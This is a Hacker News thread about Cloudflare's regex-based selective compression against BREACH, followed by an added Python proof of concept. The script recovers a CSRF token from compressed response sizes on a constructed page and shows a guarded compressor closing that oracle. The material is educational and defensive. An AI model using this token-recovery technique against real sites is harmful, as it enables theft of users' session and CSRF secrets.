
A Solution to Compression Oracles on the Web - kawera
https://blog.cloudflare.com/a-solution-to-compression-oracles-on-the-web/
======
kardos
Selective compression does seem like a pretty optimal approach.

> We found that in most cases a secret within a webpage can be described in
> terms of a classical regular expression.

Not sure I'd want to rely on a regex that identifies the right chunk most of
the time... that sounds fragile, easy to accidentally break with a routine
update of the page. Explicitly tagging the secret portion seems like a more
robust approach.

------
kureikain
I thought for BREACH to work, the user input has to be echoed on the page,
together with the secret, so that when they repeat, the compression size
reduces.

If we don't echo any user input data to the page, then we aren't affected by
BREACH, right?

------
crishoj
TL;DR — avoid compressing secrets.

The PoC is an Nginx module which identifies potentially secret parts of the
response using a regular expression matcher, and avoids adding these to the
compression dictionary.
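
The two points raised above (kureikain's: the attack needs attacker input reflected into the same compressed body as the secret; crishoj's: the fix is to keep the secret out of the compression dictionary) can both be seen in one runnable script. This is an added example, not code from the Cloudflare post or its nginx module. The page, the token value, the alphabet and the `SECRET_RE` pattern are constructed for the demo; `Z_FIXED` (static Huffman table) is my choice so the one-byte size signal is exact rather than something a real attacker has to average out; and `compress_guarded` emulates "do not let the secret into the dictionary" with zlib full flushes, which is coarser than the module's approach because it also drops the history before the secret.

```python
import re
import zlib
from typing import Callable, Optional

# Constructed demo page (not taken from the blog post): a hidden CSRF token,
# then a paragraph that echoes attacker-controlled query input. Any response
# with this shape (secret + reflected input in one compressed body) is the
# BREACH setting; without the reflection no LZ77 match against the token forms.
SECRET = "4f3a9c1e"
ALPHABET = "0123456789abcdef"
PAD = "~"  # occurs nowhere else in the page, so it can never be part of a match
KNOWN_PREFIX = 'name="csrf" value="'  # the attacker knows the markup around the token

TEMPLATE = (
    '<html><body><form action="/transfer" method="post">'
    '<input type="hidden" name="csrf" value="{secret}">'
    "</form><p>You searched for: {reflected}</p></body></html>"
)


def render(reflected: str, secret: str = SECRET) -> bytes:
    """Server side: build the response body for one request."""
    return TEMPLATE.format(secret=secret, reflected=reflected).encode()


def compress_plain(body: bytes) -> bytes:
    """Ordinary DEFLATE of the whole body, as gzip on a web server does.
    Z_FIXED is a demo assumption: the static Huffman table makes every literal
    cost exactly 8 bits, so a correct guess shortens the output by one byte."""
    co = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return co.compress(body) + co.flush()


# Constructed pattern for the secret part of the response; group 1 is the token.
SECRET_RE = re.compile(rb'name="csrf" value="([0-9a-f]{8})"')


def compress_guarded(body: bytes, secret_re=SECRET_RE) -> bytes:
    """Selective compression emulated with zlib full flushes (my emulation,
    not the nginx module's mechanism): each regex-matched secret sits in its own
    history-reset segment, so the secret can match nothing before it and nothing
    after it can match the secret. The result is still one valid zlib stream."""
    co = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    out = bytearray()
    pos = 0
    for m in secret_re.finditer(body):
        start, end = m.span(1)
        out += co.compress(body[pos:start])
        out += co.flush(zlib.Z_FULL_FLUSH)  # forget the history before the secret
        out += co.compress(body[start:end])
        out += co.flush(zlib.Z_FULL_FLUSH)  # forget the secret itself
        pos = end
    out += co.compress(body[pos:])
    out += co.flush()
    return bytes(out)


def roundtrips(body: bytes) -> bool:
    """The guarded stream must still inflate to the original body."""
    return zlib.decompress(compress_guarded(body)) == body


Compressor = Callable[[bytes], bytes]


def guess_score(compress: Compressor, known: str, guess: str) -> int:
    """Attacker side, the BREACH 'two tries' trick: send the guess once before and
    once after the padding byte and compare sizes. Both bodies contain the same
    bytes, so they differ only when the guess extends the LZ77 match against the
    secret; then the first body is one byte shorter. A wrong guess scores 0."""
    with_guess = len(compress(render(known + guess + PAD)))
    without_guess = len(compress(render(known + PAD + guess)))
    return with_guess - without_guess


def recover_secret(compress: Compressor, length: int = len(SECRET)) -> Optional[str]:
    """Recover the token one character at a time. Returns None as soon as no
    candidate stands out, i.e. the oracle is closed."""
    found = ""
    for _ in range(length):
        scores = {c: guess_score(compress, KNOWN_PREFIX + found, c) for c in ALPHABET}
        best = min(scores, key=scores.get)
        if scores[best] >= 0:
            return None
        found += best
    return found


if __name__ == "__main__":
    print("whole body compressed:        ", recover_secret(compress_plain))
    print("secret kept out of dictionary:", recover_secret(compress_guarded))
    print("guarded stream still inflates:", roundtrips(render("anything")))
```

Note that `compress_guarded` silently falls back to compressing everything when `SECRET_RE` stops matching, which is exactly the fragility kardos describes: a routine change to the markup around the token reopens the oracle without any error.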

